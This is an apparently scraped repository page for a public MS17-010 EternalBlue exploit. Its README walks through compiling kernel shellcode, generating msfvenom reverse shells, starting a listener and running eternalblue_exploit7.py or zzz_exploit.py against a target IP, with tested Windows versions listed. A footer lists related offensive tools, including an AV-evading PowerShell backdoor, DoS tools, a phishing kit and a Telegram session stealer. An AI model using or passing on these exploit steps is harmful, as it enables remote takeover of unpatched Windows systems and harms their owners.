Python
  • Blog
  • Contact
    • Overview
    Issues 1

    This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010

    3ndG4me 3ndG4me Last update: Apr 18, 2024

    MS17-010 Exploit Code

    This is some no-bs public exploit code that generates valid shellcode for the eternal blue exploit and scripts out the event listener with the metasploit multi-handler.

    This version of the exploit is prepared in a way where you can exploit eternal blue WITHOUT metasploit. Your options for auto shell generation are to generate shellcode with msfvenom that has meterpreter (i.e. with metasploit) or to generate a normal windows cmd shell (i.e. without metasploit). You may also select between staged and stageless payloads if you wish to avoid utilizing the msfconsole entirely and use netcat/your own shell handler. Alternatively you can elect to brew in your own shellcode.

    This allows for this version of the MS17-010 exploit to be a bit more flexible, and also fully functional, as many exploits leave out the steps to compile the kernel shellcode that usually comes with it.

    Included is also an enternal blue checker script that allows you to test if your target is potentially vulnerable to MS17-010

    run python eternal_checker.py <TARGET-IP>

    Requirements

    Core exploit code requires impacket and the mysmb.py library (included with the repo). To install any requirements simply use pip on the requirements.txt file. It's always recommended you use a virtual environment like venv when installing python dependencies, but use whatever you like.

    Additionally, the helper scripts below require the Metasploit Framework to be installed. At minimum you will need msfvenom for the shell_prep.sh but stageless command shells can be caught like any normal command shell without the use of Metasploit's multi/handler. Otherwise, simply install the metasploit framework and insure it is in your path.

    IMPORTANT SUPPORT INFO:

    Keep in mind python2 is not officially supported anymore. The original exploit code that is provided was initially built for python2, going forward any errors discovered will be adjusted for insuring the code works with python3 instead of python2. Instructions below assume python/pip are python3 by default, so if you are using python2 update based on your own paths when necessary and remember, it is NOT officially supported by this repo.

    Python2

    pip2.7 install -r requirements.txt

    Python3

    pip install -r requirements.txt

    TODO:

    • Validate python3 compatibility
    • Testing with non-msfvenom shellcode

    VIDEO TUTORIALS:

    USAGE:

    Navigate to the shellcode directory in the repo:

    run ./shell_prep.sh

    Follow the prompts, for example:

                     _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
<YOUR-IP>
LPORT you want x64 to listen on:
<SOME PORT>
LPORT you want x86 to listen on:
<SOME OTHER PORT>
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
0

    After the script finishes there will be a shellcode binary named sc_all.bin in the shellcode directory

    Next, navigate to the main repo directory:

    run listener_prep.sh

    Follow the prompts, for example:

     /,-
  ||)
  \\_, )
   `--'
Enternal Blue Metasploit Listener

LHOST for reverse connection:
<YOUR-IP>
LPORT for x64 reverse connection:
<SOME PORT>
LPORT for x86 reverse connection:
<SOME OTHER PORT>
Enter 0 for meterpreter shell or 1 for regular cmd shell:
0
Starting listener...

    PWN:

    If you have completed the USAGE steps, now you're ready to PWN the target.

    run:

    python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>

    Alternatively you may use zzz_exploit.py which is an implementation of the "Eternal" family that uses the same technique from Eternal Romance, Synergy, and Champion.

    This is not setup to send back a reverse shell or execute any sort of payload like Eternal Blue is. This uses the functions from mysmb.py to spawn a semi-interactive cmd shell. There are commented out sections of code that can be modified to interact with metasploit or send of custom payloads using the service_exec() function call.

    All of the code execution functionality can be found in the do_system_mysmb_session() function.

    This version of the exploit is great for targeting systems that have named pipes available to avoid crashing the target.

    run:

    python zzz_exploit.py <TARGET-IP>

    Enternal Blue has only been tested on Windows 7/Server 2008, and Windows 10 10240 (x64)

    zzz has only been tested on Windows XP

    However the Eternal Blue exploits included in this repo also include support for Windows 8/Server 2012 and should work.

    The zzz exploit should also work on all targets provided you have access to a named pipe. For some OS's (Windows 10) this may also require credentials of a user who can access this named pipe (This is because on newer versions, Guest and NULL sessions are not supported out of the box).

    The original exploit code that this repo pulls from is located here: https://github.com/worawit/MS17-010

    Tags:

    Owner

    3ndG4me

    3ndG4me
    GitHub Repository https://github.com/3ndG4me
    👻 A LAN dropbox chatbot controllable via Telegram

    Boot up the Pi, get an SSH sell or connect a monitor and a keyboard and enter these commands: Make sure to try it out in your lab first and test if lanGhost is responding to your messages! If you are…

    xdavidhu
    353 Feb 27, 2024
    Reverse backdoor written in PowerShell and obfuscated with Python. It generates payloads for popular hacking devices like Flipper Zero and Hak5 USB Rubber Ducky, and changes its signature after every build to help avoid AV.

    A file in the current working directory will be created called backdoor.ps1 When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved t…

    Drew-Alleman
    313 Apr 19, 2024
    📡 Overload DoS Tool

    If you don't have it, then execute:

    7zx
    319 Apr 16, 2024
    A heavily armed customizable phishing tool for educational purpose only

    A heavily armed customizable phishing tool for educational purpose only. It contains phishing email templates of mostly used social media platforms. I have made 3 youtube videos, they delete it, so i…

    Cyber-Dioxide
    323 Apr 18, 2024
    A quickly-hacked-together Python script to turn mysqldump files to CSV files. Optimized for Wikipedia database dumps.

    A quickly-hacked-together Python script to turn mysqldump files to CSV files. Optimized for Wikipedia database dumps. Extraordinarily large MySQL dumps can be difficult or impossible to import on fai…

    jamesmishra
    326 Apr 03, 2024
    "Hacking Secret Ciphers with Python" programs

    Here's a general description of each of the files:

    asweigart
    339 Apr 17, 2024
    DDOS Tool: To take down small websites with HTTP FLOOD. Port scanner: To know the open ports of a site. FTP Password Cracker: To hack file system of websites.. Banner Grabber: To get the service or software running on a port. (After knowing the software running google for its vulnerabilities.) Web Spider: For gathering web application hacking information. Email scraper: To get all emails related to a webpage IMDB Rating: Easy way to access the movie database. Both .exe(compressed as zip) and .py versions are available in files.

    or: DOS Tool: To take down small websites by flooding with HTTP connections. Port scanner: To know the open/vulnerable ports of a site. FTP Password Cracker: To hack file system of websites.. Banner …

    ritvikb99
    349 Apr 10, 2024
    A Tools Session Hijacking And Stealer Local Passcode Telegram Windows

    A Tools Session Hijacking And Stealer Local passcode Telegram Windows

    ultrasecurity
    353 Apr 11, 2024
    Brute Force Attack Tools Using Python

    Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change. Please make sure to update tests as appropriate.

    Antu7
    370 Apr 18, 2024
    This repo contains some solved python hacker codes

    This repo contains some solved python codes dedicated for below two cases.

    RekhuGopal
    370 Apr 19, 2024

    Subscribe to our newsletter